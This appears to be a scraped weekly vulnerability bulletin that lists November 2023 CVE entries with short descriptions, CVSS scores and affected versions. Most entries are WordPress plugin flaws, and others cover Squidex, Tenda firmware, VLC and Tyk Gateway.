squidex.io — squidex Squidex is an open source headless CMS and content management hub. Affected versions are subject to an arbitrary file write vulnerability in the backup restore feature which allows an authenticated attacker to gain remote code execution (RCE). Squidex allows users with the `squidex.admin.restore` permission to create and restore backups. Part of these backups are the assets uploaded to an App. For each asset, the backup zip archive contains a `.asset` file with the actual content of the asset as well as a related `AssetCreatedEventV2` event, which is stored in a JSON file. Amongst other things, the JSON file contains the event type (`AssetCreatedEventV2`), the ID of the asset (`46c05041-9588-4179-b5eb-ddfcd9463e1e`), its filename (`test.txt`), and its file version (`0`). When a backup with this event is restored, the `BackupAssets.ReadAssetAsync` method is responsible for re-creating the asset. For this purpose, it determines the name of the `.asset` file in the zip archive, reads its content, and stores the content in the filestore. When the asset is stored in the filestore via the UploadAsync method, the assetId and fileVersion are passed as arguments. These are further passed to the method GetFileName, which determines the filename where the asset should be stored. The assetId is inserted into the filename without any sanitization and an attacker with squidex.admin.restore privileges to run arbitrary operating system commands on the underlying server (RCE). 2023-11-07 7.2 CVE-2023-46253
strapi — strapi strapi is an open-source headless CMS. Versions prior to 4.13.1 did not properly restrict write access to fielded marked as private in the user registration endpoint. As such malicious users may be able to errantly modify their user records. This issue has been addressed in version 4.13.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-06 7.5 CVE-2023-39345
MISC
swtpm — swtpm In swtpm before 0.4.2 and 0.5.x before 0.5.1, a local attacker may be able to overwrite arbitrary files via a symlink attack against a temporary file such as TMP2-00.permall. 2023-11-03 7.1 CVE-2020-28407
MISC
CONFIRM
CONFIRM
sysaid — sysaid_on-premises In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023. 2023-11-10 9.8 CVE-2023-47246

 

wordpress — wordpress The Templately WordPress plugin before 2.2.6 does not properly authorize the `saved-templates/delete` REST API call, allowing unauthenticated users to delete arbitrary posts. 2023-11-06 7.5 CVE-2023-5454
MISC
tenda — ax1806_firmware Tenda AX1806 V1.0.0.1 contains a heap overflow vulnerability in setSchedWifi function, in which the src and v12 are directly obtained from http request parameter schedStartTime and schedEndTime without checking their size. 2023-11-07 9.1 CVE-2023-47455
tenda — ax1806_firmware Tenda AX1806 V1.0.0.1 contains a stack overflow vulnerability in function sub_455D4, called by function fromSetWirelessRepeat. 2023-11-07 9.1 CVE-2023-47456
tigera — calico_cloud In certain conditions for Calico Typha (v3.26.2, v3.25.1 and below), and Calico Enterprise Typha (v3.17.1, v3.16.3, v3.15.3 and below), a client TLS handshake can block the Calico Typha server indefinitely, resulting in denial of service. The TLS Handshake() call is performed inside the main server handle for loop without any timeout allowing an unclean TLS handshake to block the main loop indefinitely while other connections will be idle waiting for that handshake to finish. 2023-11-06 7.5 CVE-2023-41378
MISC
MISC
MISC
tyk — tyk Blind SQL injection in api_id parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query. 2023-11-07 9.8 CVE-2023-42283
tyk — tyk Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query. 2023-11-07 9.8 CVE-2023-42284
utoronto — pcrs PCRS <= 3.11 (d0de1e) “Questions” page and “Code editor” page are vulnerable to remote code execution (RCE) by escaping Python sandboxing. 2023-11-03 9.9 CVE-2023-46404
MISC
MISC
vaerys-dawn — discordsailv2 A vulnerability was found in Vaerys-Dawn DiscordSailv2 up to 2.10.2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Command Mention Handler. The manipulation leads to improper access controls. Upgrading to version 2.10.3 is able to address this issue. The patch is named cc12e0be82a5d05d9f359ed8e56088f4f8b8eb69. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-244483. 2023-11-05 9.8 CVE-2018-25092
MISC
MISC
MISC
MISC
vaerys-dawn — discordsailv2 A vulnerability was found in Vaerys-Dawn DiscordSailv2 up to 2.10.2. It has been rated as critical. Affected by this issue is some unknown functionality of the component Tag Handler. The manipulation leads to improper access controls. Upgrading to version 2.10.3 is able to address this issue. The name of the patch is cc12e0be82a5d05d9f359ed8e56088f4f8b8eb69. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-244484. 2023-11-06 9.8 CVE-2018-25093
MISC
MISC
MISC
MISC
veeam — one A vulnerability in Veeam ONE allows an unauthenticated user to gain information about the SQL server connection Veeam ONE uses to access its configuration database. This may lead to remote code execution on the SQL server hosting the Veeam ONE configuration database. 2023-11-07 9.8 CVE-2023-38547
videolan — vlc_media_player Videolan VLC prior to version 3.0.20 contains an incorrect offset read that leads to a Heap-Based Buffer Overflow in function GetPacket() and results in a memory corruption. 2023-11-07 9.8 CVE-2023-47359
videolan — vlc_media_player Videolan VLC prior to version 3.0.20 contains an Integer underflow that leads to an incorrect packet length. 2023-11-07 7.5 CVE-2023-47360
webidsupport — webid WeBid <=1.2.2 is vulnerable to code injection via admin/categoriestrans.php. 2023-11-08 9.8 CVE-2023-47397
weintek — easybuilder_pro Weintek EasyBuilder Pro contains a vulnerability that, even when the private key is immediately deleted after the crash report transmission is finished, the private key is exposed to the public, which could result in obtaining remote control of the crash report server. 2023-11-06 9.8 CVE-2023-5777
MISC
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Lenderd 1003 Mortgage Application.This issue affects 1003 Mortgage Application: from n/a through 1.75. 2023-11-07 9.8 CVE-2022-45357
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Scott Reilly Commenter Emails.This issue affects Commenter Emails: from n/a through 2.6.1. 2023-11-07 9.8 CVE-2022-45360
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in WebToffee WordPress Comments Import & Export.This issue affects WordPress Comments Import & Export: from n/a through 2.3.1. 2023-11-07 9.8 CVE-2022-45370
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Jason Crouse, VeronaLabs Slimstat Analytics allows SQL Injection.This issue affects Slimstat Analytics: from n/a through 5.0.4. 2023-11-06 9.8 CVE-2022-45373
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Paytm Paytm Payment Gateway paytm-payments allows SQL Injection.This issue affects Paytm Payment Gateway: from n/a through 2.7.3. 2023-11-03 9.8 CVE-2022-45805
MISC
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Icegram Icegram Express – Email Marketing, Newsletters and Automation for WordPress & WooCommerce.This issue affects Icegram Express – Email Marketing, Newsletters and Automation for WordPress & WooCommerce: from n/a through 5.5.2. 2023-11-07 9.8 CVE-2022-45810
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Paul Ryley Site Reviews. This issue affects Site Reviews: from n/a through 6.2.0. 2023-11-07 9.8 CVE-2022-46801
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in WebToffee Product Reviews Import Export for WooCommerce. This issue affects Product Reviews Import Export for WooCommerce: from n/a through 1.4.8. 2023-11-07 9.8 CVE-2022-46802
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Noptin Newsletter Simple Newsletter Plugin – Noptin. This issue affects Simple Newsletter Plugin – Noptin: from n/a through 1.9.5. 2023-11-07 9.8 CVE-2022-46803
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Repute Infosystems ARMember armember-membership allows SQL Injection.This issue affects ARMember: from n/a through 3.4.11. 2023-11-03 9.8 CVE-2022-46808
MISC
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in WPDeveloper ReviewX – Multi-criteria Rating & Reviews for WooCommerce.This issue affects ReviewX – Multi-criteria Rating & Reviews for WooCommerce: from n/a through 1.6.7. 2023-11-07 9.8 CVE-2022-46809
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Gopi Ramasamy Email posts to subscribers allows SQL Injection.This issue affects Email posts to subscribers: from n/a through 6.2. 2023-11-03 9.8 CVE-2022-46818
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Weblizar Coming Soon Page – Responsive Coming Soon & Maintenance Mode allows SQL Injection.This issue affects Coming Soon Page – Responsive Coming Soon & Maintenance Mode: from n/a through 1.5.9. 2023-11-06 9.8 CVE-2022-46849
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Spiffy Plugins Spiffy Calendar spiffy-calendar allows SQL Injection.This issue affects Spiffy Calendar: from n/a through 4.9.1. 2023-11-03 9.8 CVE-2022-46859
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in KaizenCoders Short URL allows SQL Injection.This issue affects Short URL: from n/a through 1.6.4. 2023-11-06 9.8 CVE-2022-46860
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Online ADA Accessibility Suite by Online ADA allows SQL Injection.This issue affects Accessibility Suite by Online ADA: from n/a through 4.11. 2023-11-06 9.8 CVE-2022-47420
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Neshan Maps Platform Neshan Maps neshan-maps allows SQL Injection.This issue affects Neshan Maps: from n/a through 1.1.4. 2023-11-03 9.8 CVE-2022-47426
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WpDevArt Booking calendar, Appointment Booking System allows SQL Injection.This issue affects Booking calendar, Appointment Booking System: from n/a through 3.2.7. 2023-11-06 9.8 CVE-2022-47428
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Weblizar The School Management – Education & Learning Management allows SQL Injection.This issue affects The School Management – Education & Learning Management: from n/a through 4.1. 2023-11-06 9.8 CVE-2022-47430
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Kemal YAZICI – PluginPress Shortcode IMDB allows SQL Injection.This issue affects Shortcode IMDB: from n/a through 6.0.8. 2023-11-06 9.8 CVE-2022-47432
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Web-X Be POPIA Compliant be-popia-compliant allows SQL Injection.This issue affects Be POPIA Compliant: from n/a through 1.2.0. 2023-11-03 9.8 CVE-2022-47445
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Tips and Tricks HQ, Peter Petreski Simple Photo Gallery simple-photo-gallery allows SQL Injection.This issue affects Simple Photo Gallery: from n/a through v1.8.1. 2023-11-03 9.8 CVE-2022-47588
MISC
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in GiveWP.This issue affects GiveWP: from n/a through 2.25.1. 2023-11-07 9.8 CVE-2023-22719
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Muneeb Form Builder | Create Responsive Contact Forms. This issue affects Form Builder | Create Responsive Contact Forms: from n/a through 1.9.9.0. 2023-11-07 9.8 CVE-2023-23796
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Themeum Tutor LMS allows SQL Injection.This issue affects Tutor LMS: from n/a through 2.1.10. 2023-11-03 9.8 CVE-2023-25700
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Zendrop Zendrop – Global Dropshipping zendrop-dropshipping-and-fulfillment allows SQL Injection.This issue affects Zendrop – Global Dropshipping: from n/a through 1.0.0. 2023-11-03 9.8 CVE-2023-25960
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Chris Richardson MapPress Maps for WordPress mappress-google-maps-for-wordpress allows SQL Injection. This issue affects MapPress Maps for WordPress: from n/a through 2.85.4. 2023-11-03 9.8 CVE-2023-26015
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Sajjad Hossain WP Reroute Email allows SQL Injection.This issue affects WP Reroute Email: from n/a through 1.4.6. 2023-11-06 9.8 CVE-2023-27605
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in biztechc Copy or Move Comments allows SQL Injection.This issue affects Copy or Move Comments: from n/a through 5.0.4. 2023-11-06 9.8 CVE-2023-28748
MISC
wordpress — wordpress The MStore API plugin for WordPress is vulnerable to Unauthorized Account Access and Privilege Escalation in versions up to, and including, 4.10.7 due to improper implementation of the Apple login feature. This allows unauthenticated attackers to log in as any user as long as they know the user’s email address. We are disclosing this issue as the developer has not yet released a patch, but continues to release updates and we escalated this issue to the plugin’s team 30 days ago. 2023-11-03 9.8 CVE-2023-3277
MISC
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in weDevs WP Project Manager wedevs-project-manager allows SQL Injection.This issue affects WP Project Manager: from n/a through 2.6.0. 2023-11-03 9.8 CVE-2023-34383
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Creative Solutions Contact Form Generator : Creative form builder for WordPress allows SQL Injection.This issue affects Contact Form Generator : Creative form builder for WordPress: from n/a through 2.6.0. 2023-11-06 9.8 CVE-2023-35911
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Favethemes Houzez – Real Estate WordPress Theme allows SQL Injection.This issue affects Houzez – Real Estate WordPress Theme: from n/a through 1.3.4. 2023-11-03 9.8 CVE-2023-36529
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category allows SQL Injection.This issue affects Subscribe to Category: from n/a through 2.7.4. 2023-11-06 9.8 CVE-2023-38382
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in RedNao Donations Made Easy – Smart Donations allows SQL Injection.This issue affects Donations Made Easy – Smart Donations: from n/a through 4.0.12. 2023-11-06 9.8 CVE-2023-40207
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Aiyaz, maheshpatel Contact form 7 Custom validation allows SQL Injection.This issue affects Contact form 7 Custom validation: from n/a through 1.1.3. 2023-11-06 9.8 CVE-2023-40609
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in David F. Carr RSVPMaker rsvpmaker allows SQL Injection.This issue affects RSVPMaker: from n/a through 10.6.6. 2023-11-03 9.8 CVE-2023-41652
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in ilGhera Woocommerce Support System allows SQL Injection.This issue affects Woocommerce Support System: from n/a through 1.2.1. 2023-11-06 9.8 CVE-2023-41685
MISC
wordpress — wordpress Bon Presta boninstagramcarousel between v5.2.1 to v7.0.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the url parameter at insta_parser.php. This vulnerability allows attackers to use the vulnerable website as proxy to attack other websites or exfiltrate data via a HTTP call. 2023-11-03 9.8 CVE-2023-43982
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Castos Seriously Simple Stats allows SQL Injection.This issue affects Seriously Simple Stats: from n/a through 1.5.0. 2023-11-06 9.8 CVE-2023-45001
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Pressference Pressference Exporter allows SQL Injection.This issue affects Pressference Exporter: from n/a through 1.0.3. 2023-11-06 9.8 CVE-2023-45046
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in InspireUI MStore API allows SQL Injection.This issue affects MStore API: from n/a through 4.0.6. 2023-11-06 9.8 CVE-2023-45055
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Video Gallery by Total-Soft Video Gallery – Best WordPress YouTube Gallery Plugin allows SQL Injection.This issue affects Video Gallery – Best WordPress YouTube Gallery Plugin: from n/a through 2.1.3. 2023-11-06 9.8 CVE-2023-45069
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress allows SQL Injection.This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 7.1.1. 2023-11-06 9.8 CVE-2023-45074
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in POSIMYTH Nexter allows SQL Injection.This issue affects Nexter: from n/a through 2.0.3. 2023-11-06 9.8 CVE-2023-45657
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Online ADA Accessibility Suite by Online ADA allows SQL Injection.This issue affects Accessibility Suite by Online ADA: from n/a through 4.11. 2023-11-06 9.8 CVE-2023-45830
MISC
wordpress — wordpress The WooCommerce Ninja Forms Product Add-ons WordPress plugin before 1.7.1 does not validate the file to be uploaded, allowing any unauthenticated users to upload arbitrary files to the server, leading to RCE. 2023-11-06 9.8 CVE-2023-5601
MISC
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Nakashima Masahiro WP CSV Exporter. This issue affects WP CSV Exporter: from n/a through 2.0. 2023-11-07 8.8 CVE-2022-38702
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Kaushik Kalathiya Export Users Data CSV. This issue affects Export Users Data CSV: from n/a through 2.1. 2023-11-07 8.8 CVE-2022-41616
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Shambix Simple CSV/XLS Exporter. This issue affects Simple CSV/XLS Exporter: from n/a through 1.5.8. 2023-11-07 8.8 CVE-2022-42882
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Patrick Robrecht Posts and Users Stats. This issue affects Posts and Users Stats: from n/a through 1.1.3. 2023-11-07 8.8 CVE-2022-44738
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in anmari amr users. This issue affects amr users: from n/a through 4.59.4. 2023-11-07 8.8 CVE-2022-45348
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Pär Thernström Simple History – user activity log, audit tool. This issue affects Simple History – user activity log, audit tool: from n/a through 3.3.1. 2023-11-07 8.8 CVE-2022-45350
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Narola Infotech Solutions LLP Export Users Data Distinct. This issue affects Export Users Data Distinct: from n/a through 1.3. 2023-11-07 8.8 CVE-2022-46804
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in wpexpertsio Email Templates Customizer and Designer for WordPress and WooCommerce email-templates allows Cross Site Request Forgery.This issue affects Email Templates Customizer and Designer for WordPress and WooCommerce: from n/a through 1.4.2. 2023-11-07 8.8 CVE-2022-47181
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in AyeCode Ltd UsersWP.This issue affects UsersWP: from n/a through 1.2.3.9. 2023-11-07 8.8 CVE-2022-47442
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Themeum Tutor LMS allows SQL Injection.This issue affects Tutor LMS: from n/a through 2.2.0. 2023-11-03 8.8 CVE-2023-25800
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Frédéric Sheedy Etsy Shop plugin <= 3.0.3 versions. 2023-11-09 8.8 CVE-2023-25975
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in WPOmnia KB Support.This issue affects KB Support: from n/a through 1.5.84. 2023-11-07 8.8 CVE-2023-25983
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Themeum Tutor LMS allows SQL Injection.This issue affects Tutor LMS: from n/a through 2.1.10. 2023-11-03 8.8 CVE-2023-25990
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Alex Benfica Publish to Schedule plugin <= 4.4.2 versions. 2023-11-09 8.8 CVE-2023-25994
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Robert Schulz (sprd.Net AG) Spreadshop plugin <= 1.6.5 versions. 2023-11-10 8.8 CVE-2023-29426
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SuPlugins Superb Social Media Share Buttons and Follow Buttons for WordPress plugin <= 1.1.3 versions. 2023-11-10 8.8 CVE-2023-29428
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in PressTigers Simple Job Board plugin <= 2.10.3 versions. 2023-11-10 8.8 CVE-2023-29440
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Newsletters plugin <= 4.8.8 versions. 2023-11-10 8.8 CVE-2023-30478
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Marco Steinbrecher WP BrowserUpdate plugin <= 4.4.1 versions. 2023-11-10 8.8 CVE-2023-31078
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Igor Benic Simple Giveaways – Grow your business, email lists and traffic with contests plugin <= 2.46.0 versions. 2023-11-09 8.8 CVE-2023-31086
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in JoomSky JS Job Manager plugin <= 2.0.0 versions. 2023-11-09 8.8 CVE-2023-31087
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Faraz Quazi Floating Action Button plugin <= 1.2.1 versions. 2023-11-09 8.8 CVE-2023-31088
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Chronosly Chronosly Events Calendar plugin <= 2.6.2 versions. 2023-11-09 8.8 CVE-2023-31093
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database plugin <= 2.4.9 versions. 2023-11-09 8.8 CVE-2023-31235
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in PeepSo Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin <= 6.0.9.0 versions. 2023-11-09 8.8 CVE-2023-32092
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Criss Swaim TPG Redirect plugin <= 1.0.7 versions. 2023-11-09 8.8 CVE-2023-32093
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Daniel Powney Multi Rating plugin <= 5.0.6 versions. 2023-11-09 8.8 CVE-2023-32125
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in xtemos WoodMart – Multipurpose WooCommerce Theme <= 7.1.1 versions. 2023-11-09 8.8 CVE-2023-32500
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in E4J s.R.L. VikBooking Hotel Booking Engine & PMS plugin <= 1.6.1 versions. 2023-11-09 8.8 CVE-2023-32501
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Sybre Waaijer Pro Mime Types – Manage file media types plugin <= 1.0.7 versions. 2023-11-09 8.8 CVE-2023-32502
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in ShortPixel ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization plugin <= 3.7.1 versions. 2023-11-09 8.8 CVE-2023-32512
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Designs & Code Forget About Shortcode Buttons plugin <= 2.1.2 versions. 2023-11-09 8.8 CVE-2023-32579
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WP Reactions, LLC WP Reactions Lite plugin <= 1.3.8 versions. 2023-11-09 8.8 CVE-2023-32587
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Palasthotel by Edward Bock, Katharina Rompf Sunny Search plugin <= 1.0.2 versions. 2023-11-09 8.8 CVE-2023-32592
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Benedict B., Maciej Gryniuk Hyphenator plugin <= 5.1.5 versions. 2023-11-09 8.8 CVE-2023-32594
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in LOKALYZE CALL ME NOW plugin <= 3.0 versions. 2023-11-09 8.8 CVE-2023-32602
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Web_Trendy WP Custom Cursors | WordPress Cursor Plugin plugin < 3.2 versions. 2023-11-09 8.8 CVE-2023-32739
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Product Recommendations plugin <= 2.3.0 versions. 2023-11-09 8.8 CVE-2023-32744
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce AutomateWoo plugin <= 5.7.1 versions. 2023-11-09 8.8 CVE-2023-32745
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Product Add-Ons plugin <= 6.1.3 versions. 2023-11-09 8.8 CVE-2023-32794
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WP Inventory Manager plugin <= 2.1.0.13 versions. 2023-11-09 8.8 CVE-2023-34002
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Guillemant David WP Full Auto Tags Manager plugin <= 2.2 versions. 2023-11-09 8.8 CVE-2023-34024
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in LWS LWS Hide Login plugin <= 2.1.6 versions. 2023-11-09 8.8 CVE-2023-34025
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Pascal Casier bbPress Toolkit plugin <= 1.0.12 versions. 2023-11-09 8.8 CVE-2023-34031
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Malinky Ajax Pagination and Infinite Scroll plugin <= 2.0.1 versions. 2023-11-09 8.8 CVE-2023-34033
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SAKURA Internet Inc. TS Webfonts for ??????????? plugin <= 3.1.2 versions. 2023-11-09 8.8 CVE-2023-34169
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Kenth Hagström WP-Cache.Com plugin <= 1.1.1 versions. 2023-11-09 8.8 CVE-2023-34177
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Groundhogg Inc. Groundhogg plugin <= 2.7.11 versions. 2023-11-09 8.8 CVE-2023-34178
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WP-Cirrus plugin <= 0.6.11 versions. 2023-11-09 8.8 CVE-2023-34181
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Peter Shaw LH Password Changer plugin <= 1.55 versions. 2023-11-09 8.8 CVE-2023-34182
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Didier Sampaolo SpamReferrerBlock plugin <= 2.22 versions. 2023-11-09 8.8 CVE-2023-34371
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPClever WPC Smart Wishlist for WooCommerce plugin <= 4.7.1 versions. 2023-11-09 8.8 CVE-2023-34386
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Nucleus_genius Quasar form free – Contact Form Builder for WordPress allows SQL Injection.This issue affects Quasar form free – Contact Form Builder for WordPress: from n/a through 6.0. 2023-11-04 8.8 CVE-2023-35910
MISC
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in BestWebSoft Post to CSV by BestWebSoft.This issue affects Post to CSV by BestWebSoft: from n/a through 1.4.0. 2023-11-07 8.8 CVE-2023-36527
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Smartypants SP Project & Document Manager allows SQL Injection.This issue affects SP Project & Document Manager: from n/a through 4.67. 2023-11-03 8.8 CVE-2023-36677
MISC
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in wpWax Directorist – WordPress Business Directory Plugin with Classified Ads Listing.This issue affects Directorist – WordPress Business Directory Plugin with Classified Ads Listings: from n/a through 7.7.1. 2023-11-07 8.8 CVE-2023-41798
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in bPlugins LLC Icons Font Loader allows SQL Injection. This issue affects Icons Font Loader: from n/a through 1.1.2. 2023-11-06 8.8 CVE-2023-46084
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Mat Bao Corp WP Helper Premium plugin <= 4.5.1 versions. 2023-11-09 8.8 CVE-2023-46614
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Djo Original texts Yandex WebMaster plugin <= 1.18 versions. 2023-11-06 8.8 CVE-2023-46775
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Serena Villa Auto Excerpt everywhere plugin <= 1.5 versions. 2023-11-06 8.8 CVE-2023-46776
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Custom Login Page | Temporary Users | Rebrand Login | Login Captcha plugin <= 1.1.3 versions. 2023-11-06 8.8 CVE-2023-46777
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in TheFreeWindows Auto Limit Posts Reloaded plugin <= 2.5 versions. 2023-11-06 8.8 CVE-2023-46778
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in EasyRecipe plugin <= 3.5.3251 versions. 2023-11-06 8.8 CVE-2023-46779
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Alter plugin <= 1.0 versions. 2023-11-06 8.8 CVE-2023-46780
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Roland Murg Current Menu Item for Custom Post Types plugin <= 1.5 versions. 2023-11-06 8.8 CVE-2023-46781
MISC
